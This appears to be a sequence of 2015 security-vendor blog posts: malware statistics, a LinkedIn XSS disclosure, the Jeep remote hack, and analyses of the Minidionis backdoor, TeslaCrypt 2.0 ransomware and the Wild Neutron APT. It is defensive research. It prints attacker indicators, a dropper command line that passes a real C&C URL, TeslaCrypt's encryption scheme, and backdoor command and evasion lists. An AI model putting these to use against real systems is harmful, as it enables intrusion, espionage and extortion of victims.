Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.
In Q2 2015, Kaspersky Lab’s file antivirus modules detected 110,731,713 unique malicious and potentially unwanted objects.Top 20 malicious objects detected on users computers Name* % unique users attacked** 1 DangerousObject.Multi.Generic 22.64% 2 Trojan.Win32.Generic 15.05% 3 Trojan.WinLNK.StartPage.gena 8.28% 4 AdWare.Script.Generic 7.41% 5 Adware.NSIS.ConvertAd.heur 5.57% 6 WebToolbar.Win32.Agent.azm 4.48% 7 WebToolbar.JS.Condonit.a 4.42% 8 Trojan-Downloader.Win32.Generic 3.65% 9 Downloader.Win32.MediaGet.elo 3.39% 10 Trojan.Win32.AutoRun.gen 3.29% 11 Downloader.Win32.Agent.bxib 3.26% 12 WebToolbar.JS.CroRi.b 3.09% 13 RiskTool.Win32.BackupMyPC.a 3.07% 14 Virus.Win32.Sality.gen 2.86% 15 Worm.VBS.Dinihou.r 2.84% 16 WebToolbar.Win32.MyWebSearch.si 2.83% 17 DangerousPattern.Multi.Generic 2.75% 18 AdWare.NSIS.Zaitu.heur 2.70% 19 AdWare.BAT.Clicker.af 2.67% 20 AdWare.Win32.MultiPlug.heur 2.54%
* These statistics are compiled from malware detection verdicts generated by the on-access and on-demand scanner modules on the computers of those users running Kaspersky Lab products who have consented to submit their statistical data.
** The proportion of individual users on whose computers the antivirus module detected these objects as a percentage of all individual users of Kaspersky Lab products on whose computers a file antivirus detection was triggered.
In line with the established practice, this ranking represents the verdicts assigned to adware programs or their components (such as AdWare.BAT.Clicker.af), and to worms distributed on removable drives.
The only virus in the rankings – Virus.Win32.Sality.gen – continues to lose ground. The proportion of user machines infected by this virus has been diminishing for a long time. In Q2 2015, Sality was in 14th place with 2.86%, a 0.32% decrease compared to the previous quarter.Countries where users faced the highest risk of local infection
For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.
Top 20 countries with the highest levels of computer infectionCountry* % unique users** 1 Bangladesh 60.53% 2 Vietnam 59.77% 3 Pakistan 58.79% 4 Mongolia 58.59% 5 Georgia 57.86% 6 Somali 57.22% 7 Nepal 55.90% 8 Afghanistan 55.62% 9 Algeria 55.44% 10 Armenia 55.39% 11 Russia 54.94% 12 Laos 54.77% 13 Iraq 54.64% 14 Kazakhstan 54.23% 15 Syria 53.00% 16 Tunisia 53.75% 17 Ethiopia 53.44% 18 Ruanda 53.17% 19 Ukraine 53.01% 20 Cambodia 52.88%
These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.
* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.
In Q2 2015, Bangladesh (60.53%) took the lead as the country with the highest level of computer infection, pushing down Vietnam which has headed the rating for almost two years. Pakistan (58.79%) rocketed from 13th position in the previous quarter to 3rd place in Q2.
The newcomers in the rankings were Georgia (5th position with 57.8%), Russia (11th position with 55%), Tunisia (16th position with 53.7%) and Ukraine (19th position with 53%).
An average of 40% of computers globally faced at least 1 local threat during Q2 2015 #KLReportTweet
The safest countries in terms of local infection risks were Sweden (19.7%), Denmark (18.4%) and Japan (15.5%).
An average of 40% of computers globally faced at least one local threat during Q2 2015, which is 0.2% percentage points more than in Q1 2015.
On November 14, 2014, security researchers from Kaspersky Lab warned LinkedIn, the world’s largest business-oriented social network, about a security issue that could pose a major threat to its 360+ million users. Because LinkedIn attracts so many people in the business community, a security flaw such as this one could help attackers to efficiently execute spear phishing campaigns, steal credentials and potentially gain remote control over selected victims without needing to resort to social engineering.
Linkedin engaged to remediate the threat and had since issued a fix to the vulnerable platform.
“While certain HTML content should be restricted and we have issued a fix and thanked Kaspersky researchers; the likelihood of exploit on popular modern email platforms is unlikely.” says David Cintz, Senior Technical Program Manager at Linkedin security ecosystem.
Researchers found the vulnerability after noticing escape character differences when posting comments from different devices in various posts. The second alert was a malfunction in the platform’s back-end parser that simply interpreted a CRLF (“Enter” keystroke) to an HTML tag <br />, appending it to the post as text. The two were not connected to each other, but they both raised important questions.
Although it may sound like not that big of a deal, a tiny malfunction like this attracts the attention of attackers. Looking at those two behaviors, researchers were convinced that something was not right. It seems like no one had noticed it. It took a trained eye to assemble the pieces of the puzzle.
ENTER keystroke being interpreted to plain-text <br /> element
Submitting multiple posts from a web browser had successfully imitated part of the behavior of the escape character differences, but there was no lead on how to bypass the anti-Cross-site Scripting (XSS) engine and generate an attack.
Further research led to a major discovery. There was a reason why the output from one device was not encoded the same as the other.
Submitting comments with HTML tags from the web platform generated %3C as the less-than character, while the same input from a mobile device was encoded to <. Further inspections led to the presence of two different platforms. But that did not mean that the web platform was vulnerable. Or did it?
Another interesting insight was that every comment to a post is sent via an email platform to all other users who were part of the thread. The differences in the body of that email confirmed our suspicions. The following screenshots illustrate the two scenarios:
A comment posted from the website with a proper escape
A comment posted from the mobile application without an escape
That proved that two different email platforms exist and that mobile notifications could help to deliver a malicious payload without any user-supplied input validations.
Signed email bounced from Linkedin regardless of its content
Social platforms are a big target for hackers. Companies in general are hit by white hat hackers on a daily basis, trying to get a piece of the internet security pie. But what if a black hat hacker finds the issue?
Looking at the following chart, we can assess how this type of security issue might give an attacker a big chunk of the solution to the problem of how to distribute malicious software under the guise of a legitimate social platform notification.
Generic Malware Distribution Cycle
Malware authors invest a lot of time in achieving each of these milestones. Every step has a big impact on the overall outcome: solid programming that can adapt to multiple systems/devices, packers and binders, obfuscation and encryption, combining reconnaissance with the right distribution method and finding the right zero-day or exploit to remotely control the system.
To save valuable time, attackers find clever ways to approach authors and purchase their needs for each milestone, as if they were goods in a store. Finalizing the shopping list to cook up this type of attack might cost a lot. A business-oriented social platform that gives details of millions of business men and women, along with their titles, colleagues, career information and more, could be extremely valuable. It’s not difficult to target a user, and exploiting that information is just a single comment away.Choose your victim
Injecting a malicious comment into a user’s post thread will automatically launch a notification to his email account, regardless of the email provider or connection hierarchy between the victim and the attacker.
Although it seems that the application server had escaped the dangerous characters, the payload is only escaped from the main application. The email template is sent as it is.
Injecting malicious payload via mobile application
Another scenario might involve using an associated HTML form to collect information about the victim or redirect the victim to a site where a malicious executable can be downloaded.
Example scenario – stealing credentials
Last November Kaspersky Lab researchers contacted Linkedin’s security team, and informed them about the issue. The platform was fixed and the threat has been mitigated.
How to prevent yourself from becoming a victim:
- Use an advanced Internet Security solution to filter out dangerous redirections to servers that contain malware, phishing and more. If a solution is already installed, keep it updated at all times.
- Opening an attachment or following a link in an email – even from a known party – might contain malicious content. Be very wary before making the decision to open it.
- Do not register to social platforms with your corporate email account.
Jonathan Jaquez – CEO, Mageni.net
David Cintz – Sr. Technical Program Manager, Linkedin
The day before yesterday was an important day for the information security industry. Investigators announced exploitation of the first ever 0-day vulnerability for cars. The wireless attack was demonstrated on a Jeep Cherokee.
Charlie Miller and Chris Valasek found the vulnerability in the onboard computer of the car. People have been talking for a long time about attacks on such systems if the attackers have access to a diagnostics jack. However a remote attack on a car’s critical systems remained a purely theoretical scenario about which experts have warned for a long time (including experts from Kaspersky Lab). Many hoped that the car manufacturers would recognise the risk of such vulnerabilities being exploited and take preventive measures. Well, we overestimated them.
The investigators gained access through the onboard entertainment system not only to non-critical settings but also the car’s controls like brakes and accelerator. The investigators plan to publish the technical details of the hack in August but the overall scheme of things is already known.Car Hack
To start with, the air conditioner, radio and windscreen wipers went crazy and the driver could do nothing about it. And then the car itself. The accelerator and brakes of the Jeep responded only to the remote investigators and not to the car’s owner at the wheel.
It is important here to note that the car had not been modified. All the above was carried out using a vulnerability in the onboard Uconnect system, which handles contact with the outside world via the infrastructure of the Sprint cell operator in cars of the FCA auto-group (Chrysler, Dodge, Fiat, Jeep and Ram). It is enough to know the external IP-address of the victim to rewrite the code in the head unit of the car (more about these units a bit later).
The company has already released a patch for Uconnect, which can be installed either at official dealers, or, for the technically minded, independently via a USB-port. At the moment the investigators can see a vehicle’s VIN, GPS coordinates and IP address by connecting to the Sprint network and using the 0-day exploit they found. By the way, to find the specific vehicle among the 471 thousand vehicles with Uconnect on board is, according to the investigators, rather difficult.A conceptual defence
This is not the first incident showing the insufficient safety mechanisms built in to modern cars as standard. Before this we saw the local seizure of the steering through the OBD-II diagnostic port and an illicit software update through a false cell base station.
Both the operating system manufacturers and the car manufacturers are now implementing important and necessary but insufficient cyber security measures. The situation is made worse by the fact that the architecture of the onboard electronic networks of vehicles was developed in the 80s, when the idea that a car would be connected to the Internet was something out of science fiction. And, consequently, although the electronic components are reliable and functionally safe the same can not be said about their cyber-security. Here at Kaspersky Lab, as in the case with conventional computer networks, we are convinced that complete multi-level safety will only be achieved by a combination of the right architecture, developed taking into account all risks, including cyber-risks, the correct setup of pre-established equipment and the use of specialised solutions.Architecture
The Kaspersky Lab approach is based on two fundamental architectural principles: isolation and controlled communications.
Isolation guarantees that two independent entities can in no way affect each other. For example, entertainment applications will not be able to affect the technical network. Not on board an aircraft and not in a car.
Control of communications guarantees that two independent entities which should work together for the system to function will do so strictly in accordance with the safety and security policy. For instance the system for acquisition of telemetry and sending it to the service centre can only read data about the condition of the car but not transfer control signals. This sort of control would have been of great help to our Jeep owner.
The use of cryptography and authentication for the transfer and receipt of information within and from outside are also indispensable parts of a protected system. But, judging by the results of the investigators, Jeep either used weak vulnerable algorithms or the cryptography was implemented with errors or not implemented at all.
The described approach — isolation and control of communications – comes naturally to a micro-kernel operating system with controlled inter-process interaction. Each logical domain has its own address space and all contact between domains is always carried out via a safety monitor.Products
Of the onboard electronics controlling critically important functions of the vehicle and theoretically open to attack the key elements are the head unit (HU) and the electronic control units (ECU), which form a whole network of controllers. There are control blocks for the engine, transmission, suspension etc.
Head units work on real time operating systems (RTOS) such as QNX, VxWorks and others. Kaspersky Lab intends to offer its own protected operating system for head units after obtaining the necessary certificates.
Both of the architectural principles mentioned above (isolation and control of communications) are fundamental principles of KasperskyOS — a safe micro-kernel operating system with controlled inter-process interaction.
The operating system was created from scratch and security was its main priority from the word go. This is the main difference between our product and the operating systems now installed in cars. We called a key component of our safe operating system the Kaspersky Security System (KSS)
During operation this system has responsibility for calculating a verdict on the security of any given event happening in the system. On the basis of this verdict the kernel of the operating system takes a decision to allow or block the event or inter-process communication. With the help of the KSS it is possible to control any activity — access to ports, files, network resources via specific applications etc. At the moment KSS works on PikeOS and Linux.
The software on the electronic control blocks is only small blocks of code and for these Kaspersky Lab intends to cooperate with microelectronics firms to jointly guarantee the safety of this embedded software.In place of a conclusion
We really don’t want to deny ourselves the comforts which the computerisation of cars has brought. However if car manufacturers don’t start taking the problem of the cyber-security of their Internet-connected cars seriously and don’t start demanding that car component manufacturers do the same then people who are concerned about safety will have to switch to classic cars. Yes old cars don’t have computers. Yes they don’t have computer-controlled fuel injection, navigation systems, climate control and other modern gadgets. But on the other hand they only obey the person at the wheel.
Yesterday our colleagues from Paloalto networks presented a research uncovering Minidionis (also known by the Kaspersky codename – “CloudLook”). It’s an another backdoor from APT group responsible for other attacks such as CozyDuke , MiniDuke, and CosmicDuke.
Analyzing this malware we noticed that attackers implemented a capability of cloud drive usage to store malware samples and downloading them on infected systems. Almost one year ago, we observed another APT group codenamed “CloudAtlas” (link), also using cloud drives to store the stolen information. And now we see a similar technique in CloudLook/Minidionis.
Minidionis uses multidropper scheme to infect it victims. Usually attacker’s uses spear-phishing emails with a self-extracting archive pretending to be a voicemail. When victim opens an archive the second stage dropper executes and a .wav file plays looking like a real voicemail. Also attackers were using a self-extracting archive containing a PDF file luring it’s victims with information regarding world terrorism:
After successful execution the second stage dropper of Minidionis malware uses Onedrive cloud storage to download payload from:
The malware maps an Onecloud storage drive as network drive using hardcoded login and password, and then copies files that stored in cloud to the local system:
Could this approach become a mainstream? It’s quite possible, because it gives the attackers a simple method of hiding malicious behavior – detection of to-the-cloud malicious traffic is more complicated as it means also blocking legitimate services.
According to Kaspersky Security Network, every single attack using Minidionis/CloudLook backdoors was specifically crafted for a particular target. This indicates that the attacks are highly customized and focused on value targets. So far, we’ve observed several targets, most notably in diplomatic organizations from Europe.
Kaspersky Lab detects all known samples of Minidionis/CloudLook as Trojan.Win32.Generic, and successfully protects its users against the threat.
Microsoft releases a long list of updates to multiple technologies today with 14 Security Bulletins (MS15-058, MS15-065 – MS15-077) patching 58 vulnerabilities, and at least 47 of them reported through a a responsible disclosure channel. Meanwhile, several are being used and detected ITW as a part of limited targeted attacks, like the Microsoft Office RCE cve-2015-2424, ATMFD.DLL EoP cve-2015-2387, and the Internet Explorer JScript9 RCE cve-2015-2419. Some were the result of breach leaks as well. A number of these have a very attractive offensive utility to defend against, so expect to see these exploits being used and re-used. Most of the July updates fall under two main categories, and the updated technologies are listed below. All of the Windows versions from Windows 7 and up maintain a critical RCE vulnerability of one sort or another. Update ASAP.
Remote code execution vulnerabilities
- Windows Server Hyper-V
- Windows DLL Handling
- SQL Server
- Internet Explorer
- VBScript Engine
- Remote Desktop Protocol (RDP)
- Microsoft Office
Elevation of privilege vulnerabilities
- Windows Graphics Component
- Windows Kernel (win32k.sys)
- Windows Installer Service
- Windows Remote Procedure Call Service
- Windows ATM Font Driver
- SQL Server
Vulnerabilities falling under other categories like XSS filter bypass, information disclosure, ASLR bypass, authentication spoofing
- Internet Explorer
- Microsoft Excel
- Windows Kernel (win32k.sys)
The most interesting of these vulnerabilities includes the RDP RCE and the Hyper-V RCE. The RDP vulnerability affects even the stripped down Windows Server 2012 Server Core installation, and seems to have been reported by an anonymous source unusually wanting no credit for a remotely exploitable critical vulnerability for a service that is often externally exposed. While Microsoft is doubtful that remote code execution is reliable, they at least acknowledge the possibility. In the past, their denial had been corrected by researchers on the potential for heap feng shei leading to exploitation of certain services, including the 2010 bug in their IIS FTPsvc.
Another couple are the Hyper-V RCE, which are buffer overflow cve-2015-2361 in the Storvsp.sys driver and an unusual “data structure vulnerability” cve-2015-2362 present in Vmicrdv.dll, Vmicvss.dll, Vmicshutdown.dll, Vmictimesync.dll, Vmicheartbeat.dll, and Vmickvpexchange.dll, available across Windows Hyper-V on Windows Server 2008, Windows Server 2008 R2, Windows 8 and Windows Server 2012, and Windows 8.1 and Windows Server 2012 R2. These were both found by an internal Microsoft engineer. Much like the Cloudburst exploit from years ago on VMWare, these enable code with execution escape from a virtual guest operating system into the host system.
Full list of July cve being updated here:
The TeslaCrypt family of ransomware encryptors is a relatively new threat: its samples were first detected in February 2015. Since then the malware has been widely portrayed in mass media as the ‘curse’ of computer gamers because it targets many game-related file types (game saves, user profiles, etc.). The Trojan’s targets have included people in the US, Germany, Spain and other countries.
TeslaCrypt is still in the active development phase: in the past months, its appearance, the name shown to victims (the malware can mimic CryptoLocker and has used the names TeslaCrypt and AlphaCrypt), extensions of encrypted files (.ecc, .ezz, .exx), as well as implementation details, have all changed.
Kaspersky Lab recently discovered the latest version of the Trojan – TeslaCrypt 2.0. This version is different from previous ones in that it uses a significantly improved encryption scheme, which means that it is currently impossible to decrypt files affected by TeslaCrypt. It also uses an HTML page instead of a GUI. Incidentally, the HTML page was copied from another Trojan – Cryptowall.
Kaspersky Lab products detect malware from the TeslaCrypt family as Trojan-Ransom.Win32.Bitman. The latest version of the Trojan that is discussed in this paper is detected as Trojan-Ransom.Win32.Bitman.tk, its MD5-hash: 1dd542bf3c1781df9a335f74eacc82a4Evolution of the threat
Each TeslaCrypt sample has an internal version of the malware. The first sample we found was version 0.2.5. It had borrowed its graphical interface, including the window header, from another encrypting ransomware program – CryptoLocker.
By version 0.4.0, the developers of TeslaCrypt had completely changed the malware’s appearance.
The following features of the malware family remain the same, regardless of the version:
- The Trojan independently generates a new, unique Bitcoin address and a private key for it. The address is used both as a victim ID and to receive payments from the victim.
- The AES-256-CBC algorithm is used to encrypt files; all files are encrypted with the same key.
- Files larger than 0x10000000 bytes (~268 MB) are not encrypted.
- C&C servers are located on the Tor network; the malware communicates with the C&Cs via public tor2web services.
- Files encrypted by the malware include many extensions matching files used in computer games.
- The Trojan deletes shadow copies.
- In spite of the scary stories about RSA-2048 shown to victims, this encryption algorithm is not used by the malware in any form.
- The Trojan was written in C++, built using Microsoft’s compiler, with cryptographic algorithm implementation taken from the OpenSSL library.
- Early versions of TeslaCrypt (0.2.5 – 0.3.x) were designed to check whether a bitcoin payment had been successfully made on the site http://blockchain.info. If the payment was received, the malware reported this to the command server and received a key to decrypt the files. This scheme was vulnerable, since an expert could send a request to the C&C and get the necessary key without making a payment.
- Versions 0.2.5 – 0.3.x saved the decryption key (with other data) in their own service file, key.dat. The area containing the key was zeroed out in the file only after completing encryption, making it possible to save the key by interrupting the encryptor’s operation (e.g., by turning off the computer). After this, the key could be extracted from key.dat and used to decrypt all files.
- In version 0.4.0 the file key.dat was renamed to storage.bin, and the decryption key was not stored openly but as a multiplicative inverse modulo the order of the standard elliptic curve secp256k1. On completing encryption, the key was overwritten with random bytes rather than zeros, but it was still possible to extract the key before the area was overwritten. This was implemented in our RakhniDecryptor utility.
Recently a sample of the Trojan with internal version 2.0.0 caught our attention. So what was different this time?
The first thing that caught the eye was that TeslaCrypt no longer has code responsible for rendering the GUI (the application window). Instead, after encrypting the files the Trojan opens an HTML page in the browser. The page was fully copied from another infamous ransomware program – CryptoWall 3.0.
The page that opens when a victim follows one of the links provided by the cybercriminals is also identical to the CryptoWall payment page, with one exception: the URLs lead to a TeslaCrypt server – the authors of the malware were certainly not going to let their rivals get their victims’ money.
TeslaCrypt initializes a string with text about CryptoWall
Why use this false front? We can only guess – perhaps the attackers wanted to impress the gravity of the situation on their victims: files encrypted by CryptoWall still cannot be decrypted, which is not true of many TeslaCrypt infections.
In any event, this is not the only change from the previous version of TeslaCrypt. The encryption scheme has been improved again and is now even more sophisticated than before. Keys are generated using the ECDH algorithm. The cybercriminals introduced it in versions 0.3.x, but in this version it seems more relevant because it serves a specific purpose, enabling the attackers to decrypt files using a ‘master key’ alone. More about this in due course.The TeslaCrypt 2.0 encryption scheme Generation of key data
The Trojan uses two sets of keys – ‘master keys’ that are unique for each infected system and ‘session keys’ that are generated each time the malware is launched on the system.Master key generation
Let Q be a standard secp256k1 elliptic curve (“SECG curve over a 256 bit prime field”) and G be the generator of a cyclic subgroup of points on this curve.
Let malware_pub be the attackers’ public key contained in the Trojan’s body (it is a point on the Q curve, stored as two separate coordinates – x and y).
When infecting a system, the Trojan generates:
- install_id – the infection identifier – a random 8-byte sequence.
- master_btc_priv – the private master key – a random 32-byte sequence, which is sent to the C&C.
- master_btc_pub = master_btc_priv * G (point on the curve) – the public master key; stored in encrypted files.
- btc_address – a bitcoin address used to receive the ransom payment – generated using the standard Bitcoin algorithm, based on master_btc_pub.
- master_ecdh_secret = ECDH(malware_pub, master_btc_priv) – a “shared master key”, required for decryption if master_btc_priv is lost or does not reach the C&C; not saved anywhere in this form.
- master_ecdh_secret_mul = master_ecdh_secret * master_btc_priv – a number that can be used to recover master_btc_priv; stored in the system.
master_btc_priv (in accordance with the Bitcoin operating principle) is a private key that is needed to ‘withdraw’ the Bitcoins sent to the newly created address btc_address.
Every time it is launched (when first infecting a computer or, e.g., after a reboot), the Trojan generates new copies of:
- session_priv – a private session key – random 32 bytes. Used to encrypt files, not saved anywhere
- session_pub = session_priv * G – a public session key. Stored in encrypted files.
- session_ecdh_secret = ECDH(master_btc_pub, session_priv) – a “shared session key” – needed to decrypt files, not saved anywhere in this form.
- session_ecdh_secret_mul = session_ecdh_secret * session_priv – a number that can be used to recover session_ecdh_secret. Stored in encrypted files.
Unlike previous version of the malware, TeslaCrypt 2.0.0 does not use key.dat or storage.bin to store data. Instead, it uses the system registry: an install_id value is stored in HKCU\Software\msys\ID, and the following structure is added to HKCU\Software\<install_id>\data:
In the familiar syntax of the C programming language, the structure can be described as follows:
Here is what it looks like on an infected system:
Starting from version 0.3.5, TeslaCrypt affects both regular drives connected to the system and all file resources available on the network (shares), even if they are not mounted as drives with letters of their own. Few other encryptors can boast this functionality.
Each file is encrypted using the AES-256-CBC algorithm with session_priv as a key. An encrypted file gets an additional extension, “.zzz”. A service structure is added to the beginning of the file, followed by encrypted file contents. The structure has the following format:
The same structure in C language syntax:
The authors of TeslaCrypt 2.0.0 completely removed the file decryption feature that was present in earlier versions of the malware. Based on analyzing the encryption scheme described above, we can suggest the following algorithms for decrypting the files:
If master_btc_priv is known, do the following:
- Read session_pub from the encrypted file;
- Calculate session_ecdh_secret = ECDH(session_pub, master_btc_priv);
- Read session_ecdh_secret_mul from the encrypted file;
- Calculate session_priv = session_ecdh_secret_mul / session_ecdh_secret;
- Decrypt the file using the session_priv key.
If master_btc_priv is unknown, but malware_priv is known (and the only people who know it are the cybercriminals who added the corresponding malware_pub to the Trojan’s body):
- Read master_btc_pub from the registry or encrypted file;
- Calculate master_ecdh_secret = ECDH(master_btc_pub, malware_priv);
- Read master_ecdh_secret_mul from the encrypted file
- Calculate master_btc_priv = master_ecdh_secret_mul / master_ecdh_secret;
- With master_btc_priv known, perform the steps from item 1.
The Trojan implements a detection evasion technique based on using COM objects. We first saw it used in TeslaCrypt version 0.4.0, but since then it has been slightly modified. Pseudocode generated based on version 2.0.0 looks like this:
The Trojan’s sample contains a static list of C&C addresses. The servers are actually on the Tor network, but communication with them is carried out through the Web using tor2web services.
Before TeslaCrypt version 0.4.1, server requests were sent in plaintext; in subsequent versions they were encrypted using the AES-256-CBC algorithm, with a SHA256 hash of a static string from the malicious program’s body used as a key.
The pseudocode screenshot below shows the process of creating an HTTP request to be sent by the Trojan when infecting a system.
Malware from the TeslaCrypt family is known to be distributed using exploit kits such as Angler, Sweet Orange and Nuclear. This method of distributing malware works as follows: when a victim visits an infected website, an exploit’s malicious code uses vulnerabilities in the browser (usually in plugins) to install target malware in the system.
Geographical distribution of users attacked by malware from the TeslaCrypt familyRecommendations
To protect data from encrypting ransomware, we advise users to backup all their important files regularly. Backup copies should be stored on drives that can only be written to as part of the process of backing up data. For example, home users can use external hard drives, physically disconnecting them from the computer immediately after creating backup copies.
Promptly updating software (particularly browser plugins and the browser itself) is also extremely important, since vendors are always striving to close any vulnerabilities that are exploited by cybercriminals.
If malware did find its way into the system, an up-to-date antivirus product with updated databases and activated protection modules can help to stop it from doing any harm. This is especially true of the proactive protection module, which is the last line of defense against 0-day threats.
A powerful threat actor known as “Wild Neutron” (also known as “Jripbot” and “Morpho”) has been active since at least 2011, infecting high profile companies for several years by using a combination of exploits, watering holes and multi-platform malware.
The latest round of attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit.
Wild Neutron hit the spotlight in 2013, when it successfully infected companies such as Apple, Facebook, Twitter and Microsoft. This attack took advantage of a Java zero-day exploit and used hacked forums as watering holes. The 2013 incident was highly publicized and, in the aftermath, the threat actor went dark for almost one year.
#WildNeutron is a powerful entity engaged in espionage, possibly for economic reasonsTweet
In late 2013 and early 2014 the attacks resumed and continued throughout 2015. Targets of the new attacks include:
- Law firms
- Bitcoin-related companies
- Investment companies
- Large company groups often involved in M&A deals
- IT companies
- Healthcare companies
- Real estate companies
- Individual users
The focus of these attacks suggests this is not a nation-state sponsored actor. However, the use of zero-days, multi-platform malware as well as other techniques makes us believe it’s a powerful entity engaged in espionage, possibly for economic reasons.Older (2013) campaigns
During the 2013 attacks, the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk[.]com, which is an iPhone developers forum.
The attackers injected a script into the forum that redirected visitors to another website (min.liveanalytics[.]org – currently SINKHOLED by Kaspersky Lab) that hosted a Java zero-day exploit. A similar attack was also found in another forum dedicated to Linux developers: fedoraforum[.]org. For a more detailed analysis of these 2013 attacks, see Eric Romang’s blog.
Other forums compromised by the Wild Neutron group and identified by reports from the Kaspersky Security Network include:
In particular, two of these stand out: “community.flexispy[.]com” and “ansar1[.]info“. The first one is a community ran by Flexispy, a company that sells spyware for mobile devices. The second one is a Jihadist forum that is currently closed.
ansar1[.]info was injected by Wild Neutron in 2013
Back in 2013, the attackers also leveraged a Mac OS X backdoor, known as OSX/Pintsized. This is also described in more detail in Eric Romang’s excellent blog. The same backdoor, compiled for Win32, is still being used in the 2015 attacks.
#WildNeutron is one of the most unusual APT group we've analysed and trackedTweet
Some of the more prominent victims of the 2013 attack include Twitter, Facebook, Apple and Microsoft. These breaches were covered widely by the press and some affect companies, issued statements on the incident (see Facebook’s statement).
The targeting of major IT companies like Facebook, Twitter, Apple and Microsoft is unusual, however, it’s not entirely unique. The lack of victims in other sectors, such as diplomatic or government institutions, is however quite unusual. This makes us believe this is not a nation-state sponsored attack.Technical analysis
The malware set used by the Wild Neutron threat actor has several component groups, including:
- A main backdoor module that initiates the first communication with C&C server
- Several information gathering modules
- Exploitation tools
- SSH-based exfiltration tools
- Intermediate loaders and droppers that decrypt and run the payloads
Although customized, some of the modules seem to be heavily based on open source tools (e.g. the password dumper resembles the code of Mimikatz and Pass-The-Hash Toolkit) and commercial malware (HTTPS proxy module is practically identical to the one that is used by Hesperbot).
Although customized, some of the modules seem to be heavily based on open source tools #WildNeutronTweet
All C&C communication is encrypted with a custom protocol. Dropped executables, as well as some of the hardcoded strings are usually obfuscated with XOR (depends on bot version). The main backdoor module contains a number of evasion techniques, designed to detect or time out sandboxes and emulation engines.Exploitation – 2015
The initial infection vector from the 2014-2015 attacks is still unknown, although there are clear indications that the victims are exploited by a kit that leverages an unknown Flash Player exploit.
The following exploitation chain was observed in one of the attacks:Site hxxp://cryptomag.mediasource.ch/ Paths /favicon.ico
The subdomain cryptomag.mediasource[.]ch appears to have been created for this attack; it pointed to an IP address associated with other Wild Neutron C&Cs, highlighted in red below:
Hosts resolving to 66.55.133[.]89
While app.cloudprotect[.]eu and ssl.cloudprotect[.]eu are two known Wild Neutron C&Cs, cryptomag.mediasource[.]ch appears to have been pointed to this IP for the purpose of exploitation. Another suspicious domain can be observed above, secure.pdf-info[.]com. We haven’t seen any attacks connected with his hostname yet, however, the name scheme indicates this is also malicious.
In another attack, we observed a similar exploitation chain, however hosted on a different website, hxxp://find.a-job.today/.
In both cases, the visitors browsed the website, or arrived via what appears to have been an online advertisement. From there, “autoload.js” appears in both cases, which redirects to another randomly named HTML file, which eventually loads a randomly named SWF file.
While the group used watering hole attacks in 2013, it’s still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks. Instead of Flash exploits, older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013, detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b.The main malware dropper
The functionality of the main dropper is relatively simple: it decrypts the backdoor executable (stored as a resource and encrypted with a simple XOR 0x66), writes it to a specified path and then executes it with parameters that are hardcoded in the dropper body. One of the parameters is the URL address of the C&C server, while others contain various bot configuration options.
Example parameters used by the dropper:
igfxupt.exe https://app.cloudprotect[.]eu:443 /opts resolv=logs.cloudprotect[.]eu
After executing the main backdoor, the dropper is securely deleted by overwriting its content with random numbers several times before renaming and removing the file.The main backdoor (aka “Jripbot”)
This binary is executed with a parameter that the URL address of the C&C server and optionally an initial bot configuration; this information is then double-encrypted – first with RC4 and then with Windows CryptProtectData function – and saved to the registry.
Before performing any other activity, the malware first runs its stalling code (designed to outrun the emulators), then performs several anti-sandboxing checks and enters an infinite loop if any unwanted software running in the system is detected.
Otherwise, it gathers some basic system information:
- Version of the operating system
- If program is running under WOW64
- If current user has administrator privileges
- Which security features of Windows are enabled
- Username and computer name
- Server name and LAN group
- Information about logical drives
- System uptime and idle time
- Default web browser
- Proxy settings
Based on some of this information, malware generates a unique ID for the victim and starts the C&C communication by sending the ID value and awaiting commands.
Backdoor configuration options may include proxy server address and credentials, sleeptime/delay values and connection type, but the most interesting option is the resolv=[url] option. If this option is set, the malware generates a domain name consisting of computer name, unique ID and and the URL passed with this option; then it tries to resolve the IP address of this domain. We suspect this is the method the attackers use to send the generated UID to the C&C.
Commands from the C&C may instruct the bot to perform following actions:
- Change the current directory to the requested one
- Execute an arbitrary command in the command line
- Set the autorun value for itself in the registry
- Delete the autorun value for itself in the registry
- Shred requested file (overwrite the file content with random numbers, overwrite the file name with zeroes and then delete it)
- Download file from the Internet and save it (optionally encrypted) to the disk
- Install or uninstall additional malware plugins
- Collect and send system information
- Enumerate drives
- Set sleeptime value
- Update the configuration
- Update itself
Older versions of this backdoor, used in the 2013 attacks, had a bit more functionality:
- Password harvesting
- Port scanning
- Collecting screenshots
- Pushing files to C&C
- Reverse shell
These features were removed from the newer backdoor versions that are used in recent attacks. Instead, malware developers decided to implement a plugin mechanism and run different tools for different tasks. This suggests a clear shift towards more flexible modular architecture.
#WildNeutron hide the C&C address by encrypting it in the registry with machine-dependent informationTweet
In terms of functionality, the main backdoor is no different from many other Remote Access Tools (RATs). What really stands out is the attacker’s carefulness to hide the C&C address, by encrypting it in the registry with machine-dependent information. Also notable is the ability to recover from a C&C shutdown by contacting a dynamically generated domain name, which only the attackers know in advance, as it is directly tied to each unique victim.
According to the timestamp of the samples the distribution is as follows:
Each backdoor appears to contain an internal version number, which ranges from 11000 to 16000 in the latest samples. This allows us to trace the following evolutionary map:
Backdoors used in the 2013 attacks:MD5 Timestamp Version Filename Size 1582d68144de2808b518934f0a02bfd6 29 Nov 2012 11000 javacpl.exe 327168 14ba21a3a0081ef60e676fd4945a8bdc 30 Nov 2012 12000 javacpl.exe 329728 0fa3657af06a8cc8ef14c445acd92c0f 09 Jan 2013 13000 javacpl.exe 343552
